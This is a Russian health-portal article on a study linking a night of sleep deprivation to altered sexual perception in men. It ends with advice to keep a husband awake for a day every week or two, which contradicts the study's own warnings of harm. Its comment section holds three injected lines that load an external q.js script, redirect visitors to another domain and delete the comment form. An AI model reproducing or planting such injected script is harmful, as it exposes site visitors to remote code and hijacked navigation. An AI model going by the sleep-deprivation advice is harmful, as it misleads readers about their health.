Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хотите, чтобы муж вас сно...  >>  Хотите, чтобы муж вас снова желал! Не дайте ему поспать сутки!
 
Обратная связь
 

Хотите, чтобы муж вас снова желал! Не дайте ему поспать сутки!

Размер шрифта
26 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Пикантные подробности выяснились в одном из недавних американских исследований оказывается, если мужчина не поспит сутки кряду, его сексуальное восприятие окружающей действительности меняется.

Хотите, чтобы муж вас снова желал! Не дайте ему поспать сутки!

Авторы исследования утверждают, что депривация (лишение) сна нарушает функцию лобной доли больших полушарий головного мозга. В прошлом было доказано, что это отражается на психическом статусе человека. В частности – у него несколько искажаются представления о риске и морали, он хуже контролирует себя и легче принимает сомнительные решения. Однако влияние депривации сна на романтическую и сексуальную сферу изучалось впервые.

В качестве испытуемых выступили шестьдесят студентов, которые заполняли специальный опросник, разработанный с целью анализа сексуального мировосприятия среди участников исследования. Скажем, один из вопросов анкеты звучит следующим образом: «Когда женщина отправляется в бар, насколько она заинтересована в поиске сексуального партнера на ночь?» Опросник заполнялся дважды: до и после бессонной ночи.

«Наши результаты указывают на то, что дефицит сна по психоневрологическим последствиям несколько напоминает влияние алкоголя, который так же подавляет активность лобной коры», – рассказывает Дженнифер Пешка, ведущий научный сотрудник исследовательской группы. «Депривация сна может иметь самые неожиданные последствия с точки зрения сексуального поведения, поскольку человек становится более раскованным, его восприятие сексуального влечения окружающих искажается. В целом, он действует иначе в сравнении с поведенческими схемами, которых он придерживается в норме. Потенциально подобная смена сексуального мировосприятия чревата серьезными проблемами, такими как домогательства, незапланированные беременности, венерические заболевания и межличностные конфликты. Все это может иметь негативные медицинские, социальные и экономические последствия, как для индивида, так и для общества в целом».

Не надо запрещать вашему мужчине спать, но раз в 1-2 неделю можно! Он сам вам скажет спасибо!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!   Как прикорнуть и зарядиться энергией на день   Как правильно спать   Как выспаться  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 15 июля 2013Сколько нужно спать, чтобы помнить все
 
11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше! 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Как спать с бронхитом
Как провести день, чтобы выспаться
Как студенческая жизнь влияет на здоровье

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.